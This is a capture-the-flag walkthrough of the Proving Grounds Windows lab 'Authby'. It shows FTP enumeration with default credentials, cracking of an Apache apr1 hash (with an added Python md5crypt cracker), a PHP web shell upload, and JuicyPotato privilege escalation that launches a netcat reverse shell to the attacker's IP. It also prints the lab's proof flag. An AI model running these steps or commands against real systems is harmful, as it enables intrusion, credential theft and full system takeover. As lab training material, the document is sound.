Authby

OSCP Proving Grounds Authby Writeup (Windows)

Recon (Enumeration)

Nmap

nmap 192.168.212.46  -sV -sC --min-rate 3000 -p- -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-25 00:22 EST
Nmap scan report for 192.168.212.46
Host is up (0.042s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
21/tcp   open  ftp                zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
| ----------   1 root     root           25 Feb 10  2011 UninstallService.bat
| ----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
| ----------   1 root     root           17 Aug 13  2011 StopService.bat
| ----------   1 root     root           18 Aug 13  2011 StartService.bat
| ----------   1 root     root         8736 Nov 09  2011 Settings.ini
| dr-xr-xr-x   1 root     root          512 Nov 25 11:43 log
| ----------   1 root     root         2275 Aug 09  2011 LICENSE.htm
| ----------   1 root     root           23 Feb 10  2011 InstallService.bat
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
|_dr-xr-xr-x   1 root     root          512 Jan 23  2023 accounts
242/tcp  open  http               Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
| http-auth: 
| HTTP/1.1 401 Authorization Required\x0D
|_  Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
|_http-title: 401 Authorization Required
3145/tcp open  zftp-admin         zFTPServer admin
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=LIVDA
| Not valid before: 2023-01-22T09:37:27
|_Not valid after:  2023-07-24T09:37:27
| rdp-ntlm-info: 
|   Target_Name: LIVDA
|   NetBIOS_Domain_Name: LIVDA
|   NetBIOS_Computer_Name: LIVDA
|   DNS_Domain_Name: LIVDA
|   DNS_Computer_Name: LIVDA
|   Product_Version: 6.0.6001
|_  System_Time: 2023-11-25T05:23:53+00:00
|_ssl-date: 2023-11-25T05:23:58+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

FTP

ftp 192.168.246.46 21
Connected to 192.168.246.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
Name (192.168.246.46:g0): anonymous
331 User name received, need password.
Password: 
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||2048|)
150 Opening connection for /bin/ls.
total 9680
----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
----------   1 root     root           25 Feb 10  2011 UninstallService.bat
----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
----------   1 root     root           17 Aug 13  2011 StopService.bat
----------   1 root     root           18 Aug 13  2011 StartService.bat
----------   1 root     root         8736 Nov 09  2011 Settings.ini
dr-xr-xr-x   1 root     root          512 Nov 09 13:24 log
----------   1 root     root         2275 Aug 09  2011 LICENSE.htm
----------   1 root     root           23 Feb 10  2011 InstallService.bat
dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
dr-xr-xr-x   1 root     root          512 Jan 23  2023 accounts

Anonymous login works, and the anonymous account's root is the zFTPServer installation directory itself: the server binary, Settings.ini, the service scripts, the log and certificates folders and an accounts directory are all listed.

The accounts directory also gives up some interesting user names.

ftp> cd accounts
250 CWD Command successful.
ftp> dir
229 Entering Extended Passive Mode (|||2050|)
150 Opening connection for /bin/ls.
total 4
dr-xr-xr-x   1 root     root          512 Jan 23  2023 backup
----------   1 root     root          764 Jan 23  2023 acc[Offsec].uac
----------   1 root     root         1032 Nov 09 13:25 acc[anonymous].uac
----------   1 root     root          926 Jan 23  2023 acc[admin].uac
226 Closing data connection.


So there are three accounts on this FTP server: admin, Offsec and anonymous (the acc[<name>].uac files look like zFTPServer's per-account definitions).

Let's try admin:admin to log into FTP!

ftp 192.168.246.46 21  
Connected to 192.168.246.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
Name (192.168.246.46:g0): admin
331 User name received, need password.
Password: 
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||2078|)
150 Opening connection for /bin/ls.
total 3
-r--r--r--   1 root     root           76 Nov 08  2011 index.php
-r--r--r--   1 root     root           45 Nov 08  2011 .htpasswd
-r--r--r--   1 root     root          161 Nov 08  2011 .htaccess
226 Closing data connection.
ftp> more .htaccess
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>
ftp> 
ftp> more .ht
.htaccess       .htpasswd
ftp> more .htpasswd
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
ftp> ls
ftp: No control connection for command
226 Closing data connection.
ftp> exit    

Well, what do we have here! The admin account's FTP root is Apache's document root (AuthUserFile in .htaccess points at c:\wamp\www\.htpasswd, and both files sit next to index.php), and .htpasswd hands us an Apache apr1 MD5 hash for the user offsec.

I ran john against this hash (john handles the $apr1$ prefix under its md5crypt format) and it found the password elite:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt  --format=md5crypt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
elite            (?)     
1g 0:00:00:00 DONE (2023-11-24 22:48) 10.00g/s 253440p/s 253440c/s 253440C/s 191192..260989
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
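To see what john was actually doing with that line, here is an added example (mine, not the writeup's and not john's code) that implements the apr1 flavour of md5crypt in pure Python and runs the .htpasswd line from the box through a small constructed wordlist. The hash line and user name are taken from the FTP transcript above; the wordlist, function names and the verify/crack helpers are this example's own. The algorithm is the FreeBSD md5crypt construction with Apache's `$apr1$` magic, which is exactly why john loads it as md5crypt.

```python
"""Verify and dictionary-attack an Apache .htpasswd apr1 line.

Added example, not part of the original writeup or of john. Implements the
apr1 variant of md5crypt (the $apr1$ prefix produced by `htpasswd -m`) so the
cracked line from the box can be checked without any external tool.
"""
import hashlib
import hmac
from typing import Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """crypt(3)-style base64: emit `count` chars, least-significant 6 bits first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: str, salt: str, magic: str = "$apr1$") -> str:
    """md5crypt as in the original FreeBSD implementation; magic is "$1$" or "$apr1$"."""
    pw = password.encode()
    salt = salt[:8]  # at most 8 salt characters are used
    sb = salt.encode()

    ctx = hashlib.md5(pw + magic.encode() + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    # Mix in the alternate digest once per 16 bytes of password (tail truncated)
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    # For each bit of the password length: a NUL byte if set, the first password byte if clear
    bits = len(pw)
    while bits:
        ctx.update(b"\x00" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()

    # 1000 rounds with a deliberately irregular schedule
    for i in range(1000):
        rnd = hashlib.md5()
        rnd.update(pw if i & 1 else final)
        if i % 3:
            rnd.update(sb)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()

    # Permuted crypt-base64 encoding of the 16 digest bytes (22 characters)
    encoded = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    encoded += _to64(final[11], 2)
    return f"{magic}{salt}${encoded}"


def verify_htpasswd(line: str, password: str) -> bool:
    """Check `password` against one `user:$apr1$salt$hash` .htpasswd line."""
    _, stored = line.strip().split(":", 1)
    if not stored.startswith("$apr1$"):
        raise ValueError("only $apr1$ entries are handled here")
    _, magic, salt, _ = stored.split("$")
    candidate = md5crypt(password, salt, f"${magic}$")
    return hmac.compare_digest(candidate, stored)  # constant-time compare


def crack_htpasswd(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first word in `wordlist` that matches the line, else None."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if verify_htpasswd(line, word):
            return word
    return None


if __name__ == "__main__":
    # The .htpasswd line pulled from the box over FTP
    LINE = "offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0"
    # Constructed mini wordlist standing in for rockyou
    WORDS = ["password", "admin", "letmein", "elite"]
    print(crack_htpasswd(LINE, WORDS))  # → elite
```

The 1000 MD5 rounds are the only thing standing between an attacker and the password; at the 250k candidates per second john reports above, a short rockyou word falls instantly, which is why apr1 (and md5crypt generally) is no longer an acceptable choice for .htpasswd files.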

Alrighty! Let's move on to initial access!

Initial Access

You might have noticed there is a web server running on port 242. It is Apache 2.2.21 with PHP 5.3.8, and it answers with a 401 whose Basic auth realm is "Qui e nuce nuculeum esse volt, frangit nucem!", the exact AuthName from the .htaccess we just pulled over FTP.

Let's try our newly found credentials, offsec:elite, here!

Alrighty.

Remember our FTP server?

total 3
-r--r--r--   1 root     root           76 Nov 08  2011 index.php
-r--r--r--   1 root     root           45 Nov 08  2011 .htpasswd
-r--r--r--   1 root     root          161 Nov 08  2011 .htaccess
226 Closing data connection.

This is interesting: we already know the web server runs Apache + PHP, and the admin FTP account drops us straight into that web root.

Maybe we can upload a web shell?

ftp 192.168.212.46 21    
Connected to 192.168.212.46.
220 zFTPServer v6.0, build 2011-10-17 14:25 ready.
Name (192.168.212.46:g0): admin
331 User name received, need password.
Password: 
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put dradik2.php 
local: dradik2.php remote: dradik2.php
229 Entering Extended Passive Mode (|||2063|)
150 File status okay; about to open data connection.
100% |**********************************************************|  7206       70.84 MiB/s    00:00 ETA
226 Closing data connection.
7206 bytes sent in 00:00 (285.87 KiB/s)
ftp> exit
221 Goodbye.

Yes we can!

Browsing to the uploaded file on port 242, past the Basic auth prompt, gives us the web shell. Look how pretty it is!

I retrieved the user flag by navigating to the user's home directory from the web shell and reading the flag file there.

I upgraded the web shell to a reverse shell and started probing the machine.

I spent way too much time here, but this is Windows Server 2008 SP1 (build 6.0.6001, as both the RDP NTLM info from nmap and the cmd banner later show) with no patches applied beyond that.

Privilege Escalation

I delved into various potato exploits.

JuicyPotato (x86) looked like the one that would get us SYSTEM. It abuses SeImpersonatePrivilege, which the account running a web server typically holds, so it is worth confirming with whoami /priv before spending time on it.

I attempted MS13-053 (the EPATHOBJ ring0 exploit) first, to no avail; it is probabilistic and, as its own output says, can take several attempts.

.\MS13-053.exe
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
------------------- taviso () cmpxchg8b com, programmeboy () gmail com ---


[+] NtQueryIntervalProfile () 77538AC8
[+] NtQuerySystemInformation () 77538BC8
[?] NtQuerySystemInformation() => \SystemRoot\system32\ntkrnlpa.exe () 8160A000
[+] Discovered a ret instruction at 8160B31E
[+] Allocated userspace PATHRECORD () 00860000
[+]   ->next  @ 00860000
[+]   ->prev  @ 42424242
[+]   ->flags @ 0
[+] Searching for an available stub address...
[+] Success, ExploitRecordExit () 0x4065ff40
[+]   ->next  @ 00000000
[+]   ->prev  @ 00000000
[+]   ->flags @ 1
[+] ExploitRecord () 0xe87020
[+]   ->next  @ 4065FF40
[+]   ->prev  @ 8170241C
[+]   ->flags @ 17
[+] Creating complex bezier path with 86000
[+] Begin CreateRoundRectRgn cycle
[+] Allocated 263 HRGN objects
[+] Flattening curves...
[!] No luck, run exploit again (it can take several attempts)
[+] Press any key to exit...


C:\wamp\www>.\MS13-053.exe

JuicyPotato

I figured I'd give this a try.

C:\wamp\www>.\Juicy.Potato.x86.exe
.\Juicy.Potato.x86.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

C:\wamp\www>.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
Testing {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} 1337
COM -> recv failed with error: 10038

Fail. Let's try another CLSID.

The JuicyPotato project documents a long list of handy CLSIDs, grouped by Windows version.

So we find a suitable CLSID and test! (The -z switch in the usage above tests a CLSID and prints the impersonated token's user without launching anything, which is the quieter way to go through a list.)

C:\wamp\www>.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {752073A1-23F2-4396-85F0-8FDB879ED0ED}
.\Juicy.Potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {752073A1-23F2-4396-85F0-8FDB879ED0ED}
Testing {752073A1-23F2-4396-85F0-8FDB879ED0ED} 1337
....
[+] authresult 0
{752073A1-23F2-4396-85F0-8FDB879ED0ED};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

C:\wamp\www>nc
nc
'nc' is not recognized as an internal or external command,
operable program or batch file.

C:\wamp\www>.\Juicy.Potato.x86.exe -l 1337 -c "{752073A1-23F2-4396-85F0-8FDB879ED0ED}" -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.45.215 12346" -t *
.\Juicy.Potato.x86.exe -l 1337 -c "{752073A1-23F2-4396-85F0-8FDB879ED0ED}" -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.45.215 12346" -t *
Testing {752073A1-23F2-4396-85F0-8FDB879ED0ED} 1337
....
[+] authresult 0
{752073A1-23F2-4396-85F0-8FDB879ED0ED};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

The first successful run did spawn cmd.exe as SYSTEM, but on its own console that our reverse shell cannot see, so the spawned process has to call back to us. In the middle I checked for nc. The machine didn't have it, so I uploaded nc.exe to c:\wamp\www (the directory we can already write to over FTP) and changed the payload: -p stays cmd.exe, and -a passes "/c c:\wamp\www\nc.exe -e cmd.exe <attacker IP> <port>" so the SYSTEM cmd.exe connects back with a reverse shell.

We catch the shell and we are now NT AUTHORITY\SYSTEM!

Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>more proof.txt
more proof.txt
d935e8d5acb71070b29ad5266c11bcb4

GG!
